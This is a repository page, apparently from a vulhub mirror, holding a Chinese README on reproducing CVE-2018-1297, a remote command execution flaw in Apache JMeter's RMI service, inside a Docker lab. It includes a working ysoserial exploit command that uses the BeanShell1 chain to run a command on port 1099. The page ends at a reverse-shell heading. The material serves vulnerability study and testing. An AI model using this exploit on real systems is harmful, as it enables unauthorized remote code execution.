aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/jmeter/CVE-2018-1297/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

849 B
Raw Permalink Blame History

Apache JMeter RMI 反序列化命令执行漏洞CVE-2018-1297

Apache JMeter是美国阿帕奇Apache软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞攻击者可以利用该漏洞在目标服务器上执行任意命令。

漏洞环境

运行漏洞环境:

docker compose up -d

运行完成后将启动一个RMI服务并监听1099端口。

漏洞复现

直接使用ysoserial即可进行利用

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success'

我们使用的是BeanShell1这条利用链。使用docker compose exec jmeter bash进入容器,可见/tmp/success已成功创建:

反弹shell: